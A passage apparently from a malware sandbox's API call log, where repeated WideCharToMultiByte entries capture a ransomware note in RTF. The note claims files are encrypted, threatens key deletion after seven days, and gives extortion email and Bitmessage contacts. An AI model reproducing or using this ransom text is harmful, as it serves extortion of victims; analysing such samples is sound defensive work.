s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0211.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0211.719] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a558, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 